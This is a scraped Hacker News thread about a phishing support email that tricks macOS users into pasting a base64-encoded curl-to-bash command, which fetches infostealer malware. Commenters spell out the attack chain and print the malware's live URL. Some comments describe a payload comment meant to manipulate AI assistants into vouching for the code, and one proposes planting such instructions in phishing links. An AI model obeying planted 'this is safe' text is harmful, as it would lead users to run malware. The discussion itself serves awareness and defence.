The Scariest "user Support" Email I've Received
Posted3 months agoActive2 months ago
devas.lifeTechstoryHigh profile
heatedmixed
Debate
80/100
PhishingCybersecurityMalwareAI-Powered Attacks
Key topics
Phishing
Cybersecurity
Malware
AI-Powered Attacks
A developer shares a "scary" user support email that contained a phishing attack, sparking a discussion on the sophistication of modern phishing attacks and the role of AI in amplifying their effectiveness.
Snapshot generated from the HN discussion
Discussion Activity
Very active discussionFirst comment
6d
Peak period
138
Day 6
Avg / period
32
Comment distribution160 data points
Loading chart...
Based on 160 loaded comments
Key moments
- 01Story posted
Oct 15, 2025 at 4:47 AM EDT
3 months ago
Step 01 - 02First comment
Oct 20, 2025 at 5:36 PM EDT
6d after posting
Step 02 - 03Peak activity
138 comments in Day 6
Hottest window of the conversation
Step 03 - 04Latest activity
Oct 26, 2025 at 8:36 PM EDT
2 months ago
Step 04
Generating AI Summary...
Analyzing up to 500 comments to identify key contributors and discussion patterns
ID: 45589715Type: storyLast synced: 11/20/2025, 8:28:07 PM
Want the full context?
Jump to the original sources
Read the primary article or dive into the live Hacker News thread when you're ready.
lol we are so cooked
Before LLMs if someone wasn't familiar with deobfuscation they would have no easy way to analyse the attack string as they were able to do here.
Claude reported basically the same thing from the blog post, but included an extra note:
> The comment at the end trying to trick me into saying it's harmless is part of the attack - it's attempting to manipulate AI assistants into vouching for malicious code.
A couple of times per month I give Gemini a try at work, and it is good at some things and bad at others. If there is a confusing compiler error, it will usually point me in the right direction faster than I could figure it out myself.
However, when it tries to debug a complex problem it jumps to conclusion after conclusion “a-ha now I DEFINTELY understand the problem”. Sometimes it has an OK idea (worth checking out, but not conclusive yet), and sometimes it has very bad ideas. Most times, after I humor it by gathering further info that debunks its hypotheses, it gives up.
The command even mentions base64.
What if ChatGPT said everything is fine?
I'm very much an AI skeptic, but it's undeniable that LLMs have obsoleted 30 years worth of bash scripting knowledge - any time I think "I could take 5min and write that" an LLM can do it in under 30 seconds and adds a lot more input validation checks than I would in 5min. It also gets the regex right the first time, which is better than my grug brain for anything non-trivial.
And I truly hope nobody needs ChatGPT to tell them that running an unknown curl command is a very bad idea.
The problem is the waste of resources for such a simple task. No wonder we need so much more power plants.
Again, I am an AI skeptic and hate the power usage, but it's obvious why people turn to it in this scenario.
Maybe ChatGPT can execute malicious code but that also seems less likely to be my problem.
When I come across obviously malicious payloads I get a little paranoid. I don't know why copy-pasting it somewhere might cause a problem, but ChatGPT is something where I'm pretty confident it won't do an RCE on my machine. I have less confidence if I'm pasting it into a browser or shell tool. I guess maybe writing a python script where the base64 is hardcoded, that seems pretty safe, but I don't know what the person spear phishing me has thought of or how well resourced they are.
That makes no sense.
If you think that there's obvious answers to what is and isn't safe here I think you're not paranoid enough. Everything carries risk and some of it depends on what I know; some tools might be more or less useful depending on what I know how to do with them, so your set of tools that are worth the risk are going to be different from mine.
I don't think so, I feel like the built-in echo and base64 commands are obviously more potentially secure than ChatGPT
Decoded:
This isn't exactly obfuscated. Download an executable file, make it executable, and then execute it.I remember tons of "what's this JS/PHP blob do I found in my Wordpress site" back in the day that were generally more obfuscated than a single base64 pass
Absolutely not.
I just wasted 4 hours trying to debug an issue because a developer decided they would shortcut things and use an LLM to add just one more feature to an existing project. The LLM had changed the code in a non-obvious way to refer to things by ID, but the data source doesn't have IDs in it which broke everything.
I had to instrument everything to find where the problem actually was.
As soon as I saw it was referring to things that don't exist I realised it was created by an LLM instead of a developer.
LLMs can only create convincing looking code. They don't actually understand what they are writing, they are just mimicking what they've seen before.
If they did have the capacity to understand, I wouldn't have lost those 4 hours debugging its approximation of code.
Now I'm trying to figure out if I should hash each chunk of data into an ID and bolt it onto the data chunk, or if I should just rip out the feature and make it myself.
The we’re cooked refers to the fact of using ChatGPT to decode the base64 command.
That’s like using ChatGPT to solve a simple equation like 4*12, especially for a developer. There are tons of base64 decoder if don’t want to write that one liner yourself.
No wonder we need a lot more power plants. Who cares how much CO2 is released alone to build them. No wonder we don’t make real progress in stopping climate change.
What about the everything machine called brain?
Imagine being this way. Hence "we're cooked".
May anyone do it for me? Use "otool", "dtruss", and "tcpdump" or something. :D Be careful!
The executable is available here: https://www.amanagencies.com/assets/js/grecaptcha as per decoded base64.
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. I posted a bit more analysis here: https://news.ycombinator.com/item?id=45650144
> AMOS is designed for broad data theft, capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items, Apple Notes, and files from common folders.
[0] https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
Got anything better? :D Something that may be worth getting macOS for!
Edit: I have some ideas to make this one better, for example, or to make a new one from scratch. I really want to see how mine would fare against security researchers (or anyone interested). Any ideas where to start? I would like to give them a binary to analyze and figure out what it does. :D I have a couple of friends who are bounty hunters and work in opsec, but I wonder if there is a place (e.g. IRC or Matrix channel) for like-minded, curious individuals. :)
If the LLM takes it upon itself to download malware, the user is protected.
lol we are so cooked
This guy makes an app and had to use a chatbot to do a base64 decode?
It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).
It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.
In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).
https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D'...
Isn't it just basic problem solving skill? We gonna let AI do the thinky bit for us now?
https://news.ycombinator.com/item?id=45591707
We definitely need AI lessons in school or something. Maybe some kind of mandatory quiz before you can access ChatGPT.
Not so smart, after all.
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.
Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32
The reality is that your CEO will fall for it.
I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.
Come to think of it... you are right! The barrier to entry was higher yet we fell for it! Err, I did fall for it when I was around 10 or something. :D
And it doesn't have to work on everyone, just enough people to be worth the effort to try.
Enough that it's still a valid tactic.
I've seen these on comporimsed wordpress sites a lot. Will copy the command to the clipboard and instruct the user to either open up PowerShell and paste it or just paste in the Win+R Run dialog.
These types of phishs have been around for a really long time.
Also, I’d bet the average site owner does not know what a terminal is. Think small business owners. Plus the thought of losing revenue because their site is unusable injects a level of urgency which means they’re less likely to stop and think about what they’re doing.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
I don't think that was ever really a thing. Which isn't to say that no one did it, but it was never a common practice. And free web site hosting came earlier than you're implying - sites like Tripod and Angelfire launched in the mid-1990s, at a time when most users were still on dialup.
I find this 7-year-old comment particularly ironic: https://news.ycombinator.com/item?id=17931747
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
- E-mail is insecure. It can be read by any number of servers between you and the sender.
- Numerically, very few healthcare companies have the time, money, or talent to self-host a secure solution, so they farm it out to a third-party that offers specific guarantees, and very few of those permit self-hosting or even custom domains because that's a risk to them.
As someone who works in healthcare, I can say that if you invent a better system and you'll make millions.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
Personally I think the judge should have made the woman go outside first, but “inside a suspect’s house” is statistically more dangerous than a traffic stop, which is the second most dangerous place for a cop to be.
I was more thinking of soon-to-be political prisoners but there are a lot of situations that match what I said.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
Far from an expert myself but I don't think this attack is directed at windows users. I don't think windows even has base64 as a command by default?
It involves no CMD though, it's basically just Win+R -> CTRL+V -> Enter
What's more baffling is that I also haven't heard of any Android malware that does this, despite most phones out there having several publicly known exploits and many phones not receiving any updates.
I can't really explain it except "social engineering like this works so well and is so much simpler that nobody bothers anymore".
But yes, zero days are too valuable to waste on random targets. Doesn't mean it never happens.
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.
The amount of legitimate reasons to ever open a link in a support email is basically zero.
When you have a company policy enforced by training and/or technology there is no thought involved, you just respond with “sorry, we can’t open external links. Please attach your screenshot to [ticketing system].”
Your ticketing/email system can literally remove all links automatically right?
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
When I design my fishing links, I'll try to embed instructions for chatbots to suggest they're safe.
An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
https://www.securityweek.com/clickfix-attack-exploits-fake-c...
This is what it put in my clipboard for me to paste:
> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.
Just a different way of spreading the malware.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targetted and wouldn't really trust it with any data.
No it didn't. It starts with "sites.google.com"
92 more comments available on Hacker News